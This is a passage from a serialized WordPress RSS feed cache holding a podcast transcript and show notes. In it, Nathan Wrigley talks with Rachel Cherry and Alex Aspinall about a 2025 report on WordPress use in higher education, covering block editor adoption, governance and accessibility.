both.</p>\n\n\n\n<p>[00:17:50] <strong>Rachel Cherry:</strong> Probably both, but largely headcount. I mean every university or institution&#8217;s different and some might actually be more cash strapped than others. But it&#8217;s largely a headcount. It&#8217;s largely the fact that in a lot of these institutions, you&#8217;ll have a web team of like three people managing 300 websites. And what that means, how they have to kind of manage how they spend their time and what they do with it.</p>\n\n\n\n<p>[00:18:12] <strong>Nathan Wrigley:</strong> Okay, so it&#8217;s a bit of both. There&#8217;s less human beings than there might be in the corporate space, but also they&#8217;re probably fairly strapped for cash.</p>\n\n\n\n<p>And then moving onto the block editor, I&#8217;ll come to you in a second, Alex, if that&#8217;s all right. But staying with Rachel for a moment. I&#8217;m looking at the chart now, 40% adoption of the block editor entirely, using them on all the websites, so point four, 40%. Then we drop down to 23% using it on some of them. 19% using on most, and then the last one really of interest here is 16% who are not using the block editor at all.</p>\n\n\n\n<p>Has that adoption just sort of slowly ramped up, because 40% in higher ed feels like, to me, it doesn&#8217;t seem like a bad number in all honesty. I know that in the real world probably it is higher adoption than that, but I&#8217;m guessing that there are many more constraints on universities just switching out to the block editor. So is that number slowly but inexorably rising? It feels like it&#8217;s going in the right direction, but with the caveats that it has to happen slowly.</p>\n\n\n\n<p>[00:19:11] <strong>Rachel Cherry:</strong> We don&#8217;t have data from the last, you know, four or five years to truly answer that question. But the vibe, or the sentiment, in our space is that, yes, it&#8217;s been slowly increasing. And part of that is just people, you know, there&#8217;s lots of factors, right? There&#8217;s people waiting for maturity. They&#8217;re waiting for it to grow more before they adopt. Or because of said resource discussion, people are waiting for the next redesign, for example.</p>\n\n\n\n<p>In our space, I think we even asked, how often do you redesign? Is one of the questions that we asked in our survey. I think it&#8217;s on average like every three years or so, three to five years, something like that. And so people in our space tend to wait for that to really implement large scale changes because it&#8217;s just easier to do it then than it is, you&#8217;re already doing a bunch of work, you might as well do it then. And so that&#8217;s another factor involved.</p>\n\n\n\n<p>[00:20:04] <strong>Nathan Wrigley:</strong> Yeah, there&#8217;s a little corollary to the chart that I&#8217;ve just described, underneath it, where the question was asked, how long did you wait before implementing the block editor? And basically the data skews towards, we&#8217;re trying to wait as long as possible. You know, more than two years is 35%. So it feels like, because of the nature of the audience, and I guess accessibility is a really crucial part of this, you&#8217;ve got to put the brakes on. You can&#8217;t be all that agile in the same way that maybe a corporate would, because you&#8217;ve got lots of stakeholders, lots of editorial teams that need updating and so on and so forth. So that&#8217;s kind of interesting.</p>\n\n\n\n<p>And then I know that you didn&#8217;t mention this, Rachel, but it&#8217;s tantalizingly underneath the question that has just been mentioned. We move on to full site editing and it feels like, whoa, the brakes are really on for that. 62% of respondents said that they&#8217;re not using full site editing at all, and the numbers are kind of into low single figures where they&#8217;re describing whether or not they&#8217;re using it on all their sites.</p>\n\n\n\n<p>So the block editor, in terms of content creation is on the rise, but it would appear that full site editing, the ability to, you know, modify themes and customise that kind of thing inside of WordPress, not so much. It feels like the breaks are really on there, probably as a result of the resources that you mentioned earlier.</p>\n\n\n\n<p>[00:21:15] <strong>Rachel Cherry:</strong> It&#8217;s probably following the same trajectory. Full site editing is newer and it will grow with time. But I think with full site editing, it&#8217;s very similar concerns to the block editor, but it&#8217;s more about governance and control. When you do set up these WordPress websites where you do have a lot of governance over accessibility or over branding, it&#8217;s really scary.</p>\n\n\n\n<p>The full site editing without fully understanding what it does, and how you can control it and set boundaries, there&#8217;s that concern about governance of, we don&#8217;t actually want people using our websites to be able to customise the site. We want a lot of control over that, most of the time, not everyone, but most people. Because in our space, a lot of the users that are coming in and kind of admining their site, or editing their site, are not trained web professionals. They are biology professor who&#8217;s kind of doing job as needed.</p>\n\n\n\n<p>And so we want them to have flexibility to go in and publish content. We want them to be able to share their research, share their information, but we don&#8217;t want them to be able to have free reign to kind of break our governance rules, and potentially create risk to our brand or to our accessibility and things like that. And so the full site editing, there&#8217;s a lot of people that are kind of hesitant and being patient for the full site editing implementation.</p>\n\n\n\n<p>[00:22:43] <strong>Nathan Wrigley:</strong> Thank you for that. So we&#8217;ve got a picture then of how WordPress is deployed. It seems like it&#8217;s the CMS of choice over in the education, higher ed landscape anyway.</p>\n\n\n\n<p>So moving over to Alex, I&#8217;m talking more about the implementation of this now. Presumably agencies such as yourself, Human Made, you are getting requests from these institutions to build these websites.</p>\n\n\n\n<p>How does that process work? Do you generally tend to work with like the web team over there and you, you know, backwards and forwards with them? And then the bit that I&#8217;m most curious about, talking about what Rachel just said, how on earth do you get these people so that they can use the website that you&#8217;ve built? Because, in many institutions it may be one or two people have got their hands on this, but it sounds like there may be several hundred people who need to access the WordPress website. So training.</p>\n\n\n\n<p>So there&#8217;s two parts to that question really. How are you interfacing in terms of building the things when you are approached by these institutions? And then how do you get to hand it off and provide a good level of support and training to them?</p>\n\n\n\n<p>[00:23:37] <strong>Alex Aspinall:</strong> Yeah, it&#8217;s a good question. I think the main back and forth we have would be with, typically the web team of course, as you guessed there. I think each institution is set up differently. I think Rachel probably could testify to the fact that, you know, the challenges and benefits of being set up one way is not mirrored and how it&#8217;s done elsewhere. So I do think agencies generally have to be flexible, and work within the parameters that they&#8217;re asked to, you know, that&#8217;s kind of our job.</p>\n\n\n\n<p>I think there are also, particularly with the biggest implementations in higher ed, there&#8217;s often other agencies involved or other specialists involved as well. You might be working with someone, you know, we might be bringing design and platform expertise and you might be working with someone that&#8217;s looking after the marketing and the wider brand of the university as well.</p>\n\n\n\n<p>So I think there&#8217;s quite a lot of collaboration indeed, like the amount of time I&#8217;ve spent within higher ed, I think collaboration is a really big theme, and I think that the successful projects that we see getting delivered are very collaborative in nature.</p>\n\n\n\n<p>And then yeah, in terms of training and handover, I imagine on the ground in the universities in question, they have a bigger challenge than perhaps we do, because we&#8217;ll be handing it over to a smaller percentage ultimately of the wider institution. We don&#8217;t run 300 separate training sessions or anything like that. We provide detailed documentation, videos, follow up sessions, and we make sure that the team that are receiving the product are fully versed in it.</p>\n\n\n\n<p>I think a lot of the time those people are. I think it&#8217;s handing it over to the editors that then the work will have to be done on a one-to-one basis in terms of what they&#8217;re allowed to do, going back to the FSE point. Not everyone can edit everything.</p>\n\n\n\n<p>[00:25:08] <strong>Nathan Wrigley:</strong> It&#8217;s kind of curious because when I see a website for, again, I&#8217;m going to use the word university. When I see the website for university, I&#8217;m just seeing this kind of brochure site, really. In other words, here&#8217;s the university, look at all the magical things that we do. But my daughter has just been at university, and there&#8217;s so much more to it than that. So there&#8217;s like this portal where my daughter goes, logs in, and now the expectation is that much of the work will be carried out in that format. You know, you&#8217;ll submit content, there will be lesson plans and all of that kind of thing.</p>\n\n\n\n<p>So essentially the question is leading me up to, what kind of things are being built into this website apart from the public facing bit, which we might call a prospectus, really? You&#8217;ve got this online prospectus, the world can see it, we can marvel at how great the university is, but it seems like there&#8217;s a heck of a lot more. Each department has its own stuff. Presumably the students, increasingly being expected to log in, especially post COVID, I imagine as well. So again, that one probably to Alex. What kind of curious things are built inside these WordPress websites, LMSs, brochure sites, and so on?</p>\n\n\n\n<p>[00:26:10] <strong>Alex Aspinall:</strong> Yeah, I mean, no, you listed off a lot of the options there really. I mean, the main three or four pages you might think of as being the university site are very much that, just the brochure. But there&#8217;s all kinds of different requirements for different departments. We&#8217;ll have different kinds of products that they want to build in there. You&#8217;ve got archives of hundreds and thousands of different reports and pieces of information from the past that will be needed to be upheld.</p>\n\n\n\n<p>We rebuilt Harvard Gazette, which is, you know, obviously part of the wider infrastructure at Harvard. So that&#8217;s a massive publishing site. That&#8217;s essentially the same as any magazine or newspaper would have. It&#8217;s what it is. As you say, the student logins, all the complexities of multi-site. Rachel, I&#8217;m sure you&#8217;ve probably got a list longer than that.</p>\n\n\n\n<p>[00:26:53] <strong>Rachel Cherry:</strong> It&#8217;s a lot, right? In my role as an accessibility professional, do a lot of governance work and it&#8217;s trying to tie together all these different types because there&#8217;s WordPress at my university, but there&#8217;s tons of other stuff. There&#8217;s front end brochure websites, and there&#8217;s research lab sites, and there&#8217;s marketing websites, and then there&#8217;s all the academic focused, as Alex mentioned a few. There&#8217;s a lot of web applications. There&#8217;s a lot of people doing a lot of different types of content in different ways. And how does that all tie together?</p>\n\n\n\n<p>We talk a lot about things like data sharing and a lot of the work that we do is also just trying to keep all this content in sync and trying to not have duplicates or not have outdated content, things like that. So when we talk about governance is like a big word that means a lot of things to different people. But a lot of it is really just kind of managing quality and the expectations of how websites are managed and how our mission as an institution is kind of presented to the world.</p>\n\n\n\n<p>So it&#8217;s interesting, Nathan, that you say, like to you, it&#8217;s like you just see this brochure site, and that&#8217;s a common conversation about kind of the challenges of enterprise. We have all this internal knowledge and we also have, you know, there&#8217;s a funny common conversation in universities about acronyms. We have all this internal terminology that we use, but does that come across to the end user? Does the work that we do translate? And it&#8217;s a complicated question to solve.</p>\n\n\n\n<p>[00:28:22] <strong>Nathan Wrigley:</strong> I&#8217;m kind of curious as to whether or not WordPress can service the needs of the entire IT department, if you like, within a higher ed institution. So I&#8217;m imagining that the legacy is that there&#8217;s many, many pieces of software that are being used throughout the university. You know, there may be some sort of portal where people log in and check in that they&#8217;re actually at work. There may be other things where people log their essays that they supply to their tutors and things like that. Plus then there&#8217;s the brochure on the front end.</p>\n\n\n\n<p>I&#8217;m curious as to whether or not WordPress in the future can handle most of those, and whether there&#8217;s an appetite from the higher ed institutions to have everything in one platform. They may see that as, you know, maybe that presents an Achilles heel to them. If there&#8217;s one systemic failure, then the whole thing goes down. But I&#8217;m curious as to whether or not WP Campus is trying to pitch WordPress as the answer to all the things, or is it a much more limited subset of things? You know, it&#8217;s the website, and it&#8217;s the LMS and that kind of thing. So that&#8217;s more of a kind of roadmap question, whether you&#8217;re trying to push WordPress as being the answer to everything.</p>\n\n\n\n<p>[00:29:20] <strong>Rachel Cherry:</strong> As an organisation, we don&#8217;t really push for WordPress to be used. It&#8217;s not really our mission. That&#8217;s not how we think or how we work. It&#8217;s really more just to support people that have, that are using it, and to help each other in our roles.</p>\n\n\n\n<p>To answer your broader question, I mean I kind of, it depends. Can WordPress be used for all these things? Sure. I&#8217;m sure you could finagle it to do a lot of things. Should it do all those things? Probably not. Not in its current state, no. It, in and of itself, is a database with programming and you can get it to do all kinds of things.</p>\n\n\n\n<p>[00:29:54] <strong>Nathan Wrigley:</strong> Yeah, there was one of the questions which I&#8217;ve just refound and it was, what challenges do you face with the WordPress plugin ecosystem? And bloat was one of the things that was mentioned. So yeah, this is specifically to do with WordPress plugins. It&#8217;s not WordPress Core. I thought that was kind of curious.</p>\n\n\n\n<p>And then in second place, just by a whisker, was accessibility requirements as well. And you&#8217;ve touched on accessibility a lot, Rachel. You&#8217;ve mentioned the word tangentially, and obviously that&#8217;s your kind of area of expertise.</p>\n\n\n\n<p>I&#8217;m guessing, but I&#8217;m not sure for certain, does the US compel certain things to be done in certain ways? You know, if you&#8217;re a university and you launch a website, does it have to comply with things? And do those things map across the globe? I know that we&#8217;ve got the European Accessibility Act, which just dropped earlier this year. So the question is pretty broad, but just tell us about the accessibility requirements and how stringent they are in higher ed as compared to just, I don&#8217;t know, if I&#8217;ve got a brochure site online selling widgets into the community.</p>\n\n\n\n<p>[00:30:51] <strong>Rachel Cherry:</strong> So unfortunately the US does not have as strong accessibility laws as Europe does, or many countries in Europe, like the UK and others. We do have some though, and we do have something called section 508, which basically means that if you receive federal funding or federal service, you do have to meet certain accessibility requirements.</p>\n\n\n\n<p>And so universities in the US largely fall under that. Not always. Universities are probably the only real kind of ecosystem in the US that does have more accessibility rules than other industries like general business. And so that&#8217;s why we did that accessibility audit of Gutenberg to help support our community in that time.</p>\n\n\n\n<p>And so it is very important, accessibility is very important. And it kind of touches on something that I said earlier about, a lot of universities in the US especially build custom plugins because they have to meet accessibility guidelines and it&#8217;s really challenging sometimes to find general use plugins available in the ecosystem that meet those guidelines. And so a lot of teams just kind of build their own stuff.</p>\n\n\n\n<p>And so I would say that those top two challenges, when it comes to bloat and accessibility are really, like that was not surprising in any way. That is the common struggle. It&#8217;s finding plugins that meet our accessibility requirements, especially with the front end. And then having plugins that do a lot of functionality that people don&#8217;t need. And so I think a lot of these times will lend people to kind of build their own plugins.</p>\n\n\n\n<p>They won&#8217;t rebuild like complicated plugins, any kind of administrative plugins or like form builders and things like that. Like, people largely will use plugins from the ecosystem. But there&#8217;s a lot of custom functionality in the work that we do.</p>\n\n\n\n<p>So once again, I think the common theme is it&#8217;s complex, and because of that complexity, there&#8217;s all kinds of interesting challenges. And so plugins are hard to kind of maintain. It feels like, I hear a lot of people expressing to me, you know, how often they have to kind of update them and keep them up to date, and manage and do all that. And so it&#8217;s not enough to stop people from using WordPress, like they&#8217;re using it, but having better solutions for some of these challenges would be an example of kind of supporting these higher ed institutions using WordPress.</p>\n\n\n\n<p>[00:33:12] <strong>Nathan Wrigley:</strong> Thank you. Alex, back to you. A question around just higher ed in general, is this like an area which Human Made is drilling down on? Is this an endeavor that you are trying to grow the pie, if you like? There&#8217;s thousands, I would imagine, maybe tens of thousands of institutions which come under the banner of higher ed. And at the moment, I don&#8217;t know what percentage of them are using WordPress. If we were to ask every single one of them, I would imagine it&#8217;s a significant percentage.</p>\n\n\n\n<p>But the idea of WP Campus, I guess, is to have a central place where people can go and learn about it. And Human Made being involved, presumably there&#8217;s some advantage to you as an enterprise agency. The question basically boils down to, is this an area that you are going to be working on, pitching towards, trying to grow in the near future?</p>\n\n\n\n<p>[00:33:55] <strong>Alex Aspinall:</strong> Yeah, for sure. I think like I said at the start, we&#8217;re generally the kind of agency who works on larger platforms, maybe more complicated platforms. And I think we&#8217;re interested in, you know, a broad range of industries. Probably higher ed is one of four or five, probably publishing, finance, enterprise generally, entertainment, higher ed. I think those industries tend to provide very interesting use cases for WordPress. We&#8217;re interested in all of them.</p>\n\n\n\n<p>I think we&#8217;ve seen, in the last couple of years, a lot of interesting higher ed projects being worked on by us and obviously by lots and lots of other people. And yeah, like we&#8217;re definitely part of that world, and really interested in it and, you know, yeah, definitely keen to continue being part of it, a hundred percent.</p>\n\n\n\n<p>[00:34:45] <strong>Nathan Wrigley:</strong> It&#8217;s kind of interesting, towards the bottom of the survey, so right near the bottom, probably nine tenths of the way through, there&#8217;s a whole series of kind of roadmap questions, if you like, things about the future of WordPress. And the fairly, I don&#8217;t know, blunt question, let&#8217;s put it that way, because it could have gone in the other direction it turns out, it&#8217;s hopefully gone in the right direction, but the question was asked, would you move to another CMS if you had time and resources?</p>\n\n\n\n<p>And gosh, that could go the wrong way. The answer was a strong 49% no. Which, when you say it like that you think, hang on, only half of the people wouldn&#8217;t move. But then you ask, then the other bit was only 23% are looking to move at all, and 28% are unknown. So really you&#8217;re up into the sort of seventies really, who either are not sure or want to stick around.</p>\n\n\n\n<p>That seems like an amazing statistic to me. And obviously, Human Made have kind of put their flag in the ground in higher ed, WP Campus, the same. It feels like you&#8217;ve got quite a lot of runway with these institutions in the future. Unless things go horribly wrong within WordPress, it looks like you&#8217;ve got an audience long into the future.</p>\n\n\n\n<p>[00:35:43] <strong>Alex Aspinall:</strong> I think the report offers a really positive view of WordPress. As a technology choice, I think on the whole, most people are saying it was delivering what they needed it to. I can&#8217;t remember if it&#8217;s 70, 75%, something like that, it was said that it was either meeting or exceeding their expectations, which I think is a large number. Again, it&#8217;s not like 90, but if you think about the amount of ways you can complain about software, particularly people that know a lot about the software, I think 75% is pretty good.</p>\n\n\n\n<p>And yeah, you&#8217;re right, whilst people are perhaps saying, oh, they&#8217;re looking around or they&#8217;re always considering alternatives, I think we&#8217;ve seen repeatedly that the platform, its security credentials, its extensibility, some of the core features, are all spoken about really, really favorably from the people that responded to the survey.</p>\n\n\n\n<p>And I think really we saw a passionate group of people responding to a technology they know a lot about. There are a lot of ways it could improve, we all know that, and the people that completed the survey know that as well, and they&#8217;ve, you know, they weren&#8217;t shy about listing them out. But I think you&#8217;re right, overall, the level of satisfaction is good, and I think with further adoption and the adoption of newer features, I think that that satisfaction should continue to grow.</p>\n\n\n\n<p>In fact, one of the things I was actually kind of wanting to ask Rachel actually was back to the point about FSE earlier on. I actually think WordPress needs to do a much better job of marketing itself, particularly around newer features, and particularly perhaps at the enterprise level, or where there&#8217;s complex use cases, or where a lot of the users aren&#8217;t developers. The benefits of FSE, for example, are numerous. And we&#8217;ve seen clients and indeed we&#8217;ve used it ourselves, and the people using it really like it, and I think that&#8217;s reflected in the report as well.</p>\n\n\n\n<p>So I was going to ask Rachel, as well as the other examples of why adoption might have been slow in higher ed, do you think that there&#8217;s actually a case for people in, maybe agencies, maybe WordPress Core doing a better job of the selling and the pitching? Because I actually believe that there are worse solutions that do a better job of convincing people that they should work in a certain way.</p>\n\n\n\n<p>[00:37:51] <strong>Rachel Cherry:</strong> I think there&#8217;s always room for more marketing and kind of communication about what&#8217;s going on, and there&#8217;s always improvement for that. And I do feel like Core could do more towards the enterprise ecosystem as well. That, you know, I don&#8217;t know what their primary use case that they&#8217;re focusing on is. But I would be surprised to find out that enterprise is higher up on that list. And so paying attention to our community and having open conversations with them, and there has been some efforts at that. There&#8217;s not like a non amount of effort on that.</p>\n\n\n\n<p>But yeah there&#8217;s, I think a good way to kind of describe how a lot of our community works is just kind of, it&#8217;s cautiously optimistic, but cautious. And having to manage risk and having to manage their time and energy, and so they&#8217;re not going to jump into anything. They&#8217;re going to do a lot of research. They&#8217;re going to try to find out who else is doing it, and is it working well for them?</p>\n\n\n\n<p>So there&#8217;s a lot of, we do a lot of case studies and try to encourage our community to share about the work they&#8217;re doing. Because really that goes a long way too. If a university sees another university using full site editing and that it&#8217;s successful, then that goes a long way.</p>\n\n\n\n<p>And when you have an absence of that, when you have an absence of examples, then it&#8217;s a struggle, right? Because our environment is so complex that an article about full site editing and what it can do doesn&#8217;t really go super far. We need to understand, not just what it does, but the long-term implications. Because once we implement it, that&#8217;s it. It&#8217;s very hard to back up, especially in our, these 300 website multi-site instances where we&#8217;ve got to train people and do all these things. We can&#8217;t rush into it.</p>\n\n\n\n<p>So there&#8217;s a lot of cautious waiting and seeing. So the more that universities can share about how they&#8217;re using the tools and how it&#8217;s working for them, and what&#8217;s not working for them. Being genuine in the reality of what we&#8217;re doing goes a long way. So there&#8217;s pros and cons, like, here&#8217;s how it worked, here&#8217;s the roadblocks we hit, here&#8217;s how it could be better. Having those kinds of conversations can really go a long way towards adoption.</p>\n\n\n\n<p>[00:39:59] <strong>Nathan Wrigley:</strong> I have a few things to add to this, and the first one would be that my expectation when a survey is put out is, broadly speaking, the expectation is that negativity is going to be the thing driving them to the survey. And that&#8217;s not what you find here. People who&#8217;ve got an axe to grind are frequently more likely to open up a survey and grind the axe, and that isn&#8217;t the case here.</p>\n\n\n\n<p>You know, it&#8217;s remarkably sanguine. Everybody seems entirely optimistic. And even the data which may be not quite as favorable, is not unfavorable. It&#8217;s just maybe not as shiny as it could have been.</p>\n\n\n\n<p>But then I&#8217;m looking at the second question here about what the favorite things are and it&#8217;s all the stuff that we lean into all the time. The extensibility, the fact that it&#8217;s free, otherwise known as cost, the fact that it&#8217;s multi-site capable, the fact that there&#8217;s plugins and what have you that you can extend it with.</p>\n\n\n\n<p>And the editing experience, so we&#8217;re talking about full site editing, I guess there as well as the editor, is low on the list of priorities, which is quite interesting. Only 36% of respondents thought that that was their priority.</p>\n\n\n\n<p>And then talking to the broader, I don&#8217;t know, the marketing piece, I think WordPress as a whole, it is really difficult to market something to the entire world. And that&#8217;s what WordPress is. So for the, like the Core community and things like that, to try and figure out where to put their best efforts, you know, how to convince people that WordPress is the solution for them, is really difficult, because it&#8217;s everybody. It&#8217;s literally anybody who might want a website.</p>\n\n\n\n<p>And so I think that&#8217;s where endeavors like WP Campus really pull out all the stops. You know, you are out there shouting loudly that this is the credible solution, if you&#8217;ve got a need for a website in the higher ed space. You are making it so that, I guess if we were to Google higher ed CMS, WordPress is going to come up fairly high. So you are growing that pie.</p>\n\n\n\n<p>But I guess the audience is fairly small, isn&#8217;t it? You know, at each institution, how many people are going to be making those searches? It&#8217;s not going to be the 300 people that you mentioned. It&#8217;s probably going to be the web team.</p>\n\n\n\n<p>So I think you&#8217;re doing great work. You know, you&#8217;re definitely finding those people and the important decision makers are probably the people. that you need to find.</p>\n\n\n\n<p>I keep coming back to the phrase, growing the pie. That&#8217;s what I think WP Campus is basically about. You know, of the 10,000 institutions out there that might use WordPress, it&#8217;s about making sure that a growing proportion of them know that it&#8217;s a credible alternative to whatever they&#8217;re using now. And from the numbers in the survey, it looks like once you&#8217;ve onboarded them, it&#8217;s easy to keep hold of them, which is pretty cool.</p>\n\n\n\n<p>[00:42:21] <strong>Rachel Cherry:</strong> For WP Campus as an organisation, we wanted to use the survey to really surface the needs. And so there&#8217;s questions in this survey that talk about what plugin needs exist.</p>\n\n\n\n<p>You know, one of my takeaways from this survey is how WordPress does need more enterprise functionality. And that&#8217;s covered a lot in the questions about plugin functionality. There is a big need and a gap for a lot of enterprise functionality in the WordPress ecosystem and higher ed needs it. So if there are people out there wanting to build it, we are ready for it.</p>\n\n\n\n<p>And so, you know, I want to surface those needs to kind of help bring more resources to our community and to what they&#8217;re doing. And so anyone out there looking to help fill that gap, please check out the survey and I&#8217;m open to have a conversation at any time, and we&#8217;d love for you to join our Slack and ask us questions and get us involved.</p>\n\n\n\n<p>[00:43:12] <strong>Nathan Wrigley:</strong> Okay, that&#8217;s an interesting call to action because you know, if you&#8217;ve got space in your calendar to build a new thing, you now have a brand new audience potentially, if you&#8217;ve not considered the higher education space, there&#8217;s a ton of data in this report which you can download. So maybe this is a whole new audience that you didn&#8217;t realise that you could tap into. Alex, was there anything, it sounded like you had something.</p>\n\n\n\n<p>[00:43:33] <strong>Alex Aspinall:</strong> Yeah, no, I was just going to echo really to what Rachel was saying there. I think the idea with this report was to, as Rachel said earlier on, provide data that has been missing. There&#8217;s no cynical play, it&#8217;s a collaborative report that&#8217;s designed to help other people understand how their peers are working, what their challenges are, how they&#8217;re trying to solve them, what kind of environment they&#8217;re doing it all in.</p>\n\n\n\n<p>It&#8217;s a really fascinating area, as I said earlier on, and we are really excited to see it develop and help it develop. And, yeah, we will be certainly collaborating with WP Campus and Rachel going forward.</p>\n\n\n\n<p>[00:44:06] <strong>Nathan Wrigley:</strong> Yeah, so whether or not, it really doesn&#8217;t matter which bit of WordPress you are attached to, whether you&#8217;re a hosting company or a plugin or a theme developer or an agency, just building out websites, there really is a bit of this which will map to whatever it is that you are doing.</p>\n\n\n\n<p>The website URL I mentioned earlier, wpcampus.org is where you&#8217;re going to find this out. I presume that they&#8217;re somewhere, if I was to explore, I would probably find a contact form. But beyond that, let&#8217;s go to Rachel first, how could people reach out to you if they&#8217;re curious about what you&#8217;ve said to today? Where would they best find you?</p>\n\n\n\n<p>[00:44:36] <strong>Rachel Cherry:</strong> Yeah, so you can join our Slack, which is accessible from wpcampus.org. There is a Slack page and you fill out a form and you get an invite, and feel free to join and start some conversations. There is a contact form on wpcampus.org, and I do receive those emails along with other people in our organisation. So that&#8217;s another great way to get in touch with me as well.</p>\n\n\n\n<p>[00:44:59] <strong>Nathan Wrigley:</strong> Thank you. And Alex, same question.</p>\n\n\n\n<p>[00:45:01] <strong>Alex Aspinall:</strong> Yeah, for us, obviously website, humanmade.com. There&#8217;s a contact form on there. But also Twitter and LinkedIn tend to be our main sort of points of contact for people getting in touch with us.</p>\n\n\n\n<p>Might also be worth flagging out, we&#8217;ve got a Word on the Future newsletter, which goes out once a month. You can sign up for that on the website. That generally has this kind of content, not always about higher education, but about the enterprise WordPress space in general. So that&#8217;s quite a nice touch point too.</p>\n\n\n\n<p>[00:45:24] <strong>Nathan Wrigley:</strong> I&#8217;ll just mention before we finish off that the WP Campus site not only links to, you know, the bits and pieces that are going on right now, but there&#8217;s the blog and there&#8217;s also links to the events as well as the Slack channel and things like that, oh, and a newsletter. There&#8217;s a whole load of opportunities to keep in touch with what&#8217;s going on over there.</p>\n\n\n\n<p>So, yeah, what I would also say is it&#8217;s very hard in an audio podcast to do justice to a report, which is primarily graphics. So please, if you&#8217;ve any curiosity around what we&#8217;ve been talking about, go and download that and you&#8217;ll be able to get the full detail of what we&#8217;ve been talking about. You&#8217;re going to find that on the Human Made website, and I will link to it in the show notes.</p>\n\n\n\n<p>Okay, Rachel Cherry, Alex Aspinall, thank you so much for chatting to me today. Really appreciate it.</p>\n\n\n\n<p>[00:46:05] <strong>Alex Aspinall:</strong> Thanks for having us.</p>\n\n\n\n<p>[00:46:06] <strong>Rachel Cherry:</strong> Yes, thank you.</p>\n</div></details>\n\n\n\n<p>On the podcast today we have <a href=\"https://www.linkedin.com/in/rachelmcherry/\">Rachel Cherry</a> and <a href=\"https://humanmade.com/who-we-are/alexaspinall/\">Alex Aspinall</a>.</p>\n\n\n\n<p>Rachel is the founder of <a href=\"https://wpcampus.org/\">WP Campus</a>, a nonprofit organization she launched a decade ago to support professionals using WordPress in higher education. Under her leadership, WP Campus has become a community hub, hosting conferences and leading research projects tailored to the unique needs of its members. Currently, Rachel serves as the organization&#8217;s Director of Technology and sits on its board of directors, where she continues to drive innovative projects.</p>\n\n\n\n<p>Alex Aspinall is part of the globally distributed team at Human Made, an established enterprise WordPress agency founded in 2011. At Human Made, Alex helps deliver large-scale web platforms for major organizations, including names like Harvard, Standard Chartered, and PlayStation. In recent years, Alex has developed a strong interest in how WordPress can uniquely serve the higher education sector, and he’s become especially passionate about exploring and supporting this use case.</p>\n\n\n\n<p>During the podcast we get into the story behind WP Campus, which has, for the past decade, been empowering people who use WordPress in colleges and universities. We explore Human Made’s growing interest in the complexities of higher education projects, from large multisite networks to the strict accessibility and governance requirements such projects increasingly require.</p>\n\n\n\n<p>The heart of the conversation is the just released ‘State of WordPress in Higher Education 2025’ report. We dig into the reports key findings such as the slow adoption of the block editor and full site editing, the challenges of managing hundreds of university websites with small web teams, and why enterprise-level tools are in such high demand.</p>\n\n\n\n<p>Whether you’re a WordPress professional, agency, educator, or are just curious about the unique needs and opportunities the higher education space offers, this episode is for you.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links</h2>\n\n\n\n<p><a href=\"https://wpcampus.org/\">WP Campus</a></p>\n\n\n\n<p> <a href=\"https://humanmade.com/resources/the-state-of-wordpress-in-higher-education-research-report/\">The State of WordPress in Higher Education</a> report</p>\n\n\n\n<p><a href=\"https://humanmade.com/\">Human Made</a></p>\n\n\n\n<p><a href=\"https://news.harvard.edu/gazette/\">Harvard Gazette</a></p>\n\n\n\n<p><a href=\"https://wpcampus.org/community-3/slack/\">WP Campus Slack</a></p>\n\n\n\n<p><a href=\"https://humanmade.com/word-on-the-future-a-wordpress-newsletter-by-human-made/\"> Word on the Future newsletter</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 10 Sep 2025 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"Open Channels FM: Sustainability, Authenticity, and Building Habits with Daily Videos\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109487\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://openchannels.fm/sustainability-authenticity-and-building-habits-with-daily-videos/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:208:\"In this \"Publishing Flow\" episode, Mark Szymanski shares insights on his daily video journey, discussing inspiration, consistency, audience engagement, and the balance between authenticity and value creation.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 10 Sep 2025 11:04:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	